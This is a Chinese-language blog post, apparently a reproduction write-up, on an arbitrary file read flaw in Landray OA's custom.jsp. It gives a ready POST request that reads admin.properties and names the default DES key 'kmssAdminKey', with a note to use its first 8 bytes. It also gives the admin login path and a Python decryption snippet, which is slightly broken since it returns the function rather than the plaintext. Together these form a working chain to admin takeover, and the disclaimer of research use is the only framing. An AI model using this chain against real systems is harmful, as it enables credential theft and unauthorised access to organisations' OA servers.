X凌OA系統任意文件讀取-DES解密
一、漏洞描述
深圳市藍凌軟件股份有限公司數字OA(EKP)存在任意文件讀取漏洞。攻擊者可利用漏洞獲取敏感信息
二、漏洞影響
藍凌OA
三、
利用 藍凌OA custom.jsp 任意文件讀取漏洞 讀取配置文件
讀取路徑:
/WEB-INF/KmssConfig/admin.properties
讀取文件:
POC:
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 127.0.0.1 User-Agent: Go-http-client/1.1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
獲取密碼DES解密登陸后台:默認密鑰為 kmssAdminKey
訪問后台登台:
http://127.0.0.1/admin.do
成功登陸后台:
編寫POC腳本驗證:
還需要自己去驗證解密:
編寫本地DES解密:
def decrypt_str(s): k = des(Des_Key, ECB, Des_IV, pad=None, padmode=PAD_PKCS5) decrystr = k.decrypt(base64.b64decode(s)) print(decrystr) return decrypt_str
發現key字符過長:
ValueError: Invalid DES key size. Key must be exactly 8 bytes long.
密鑰長了,查了一下下 需要前面8位就OK 也能解開
直接解密明文:
參考:
https://github.com/Cr4y0nXX/LandrayReadAnyFile
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
如果本文內容侵權或者對貴公司業務或者其他有影響,請聯系作者刪除。
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與你並肩前行!!!!
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
個人簡書:https://www.jianshu.com/u/bf0e38a8d400
個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
個人博客園:https://www.cnblogs.com/thelostworld/
FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article
語雀博客主頁:https://www.yuque.com/thelostworld
歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”
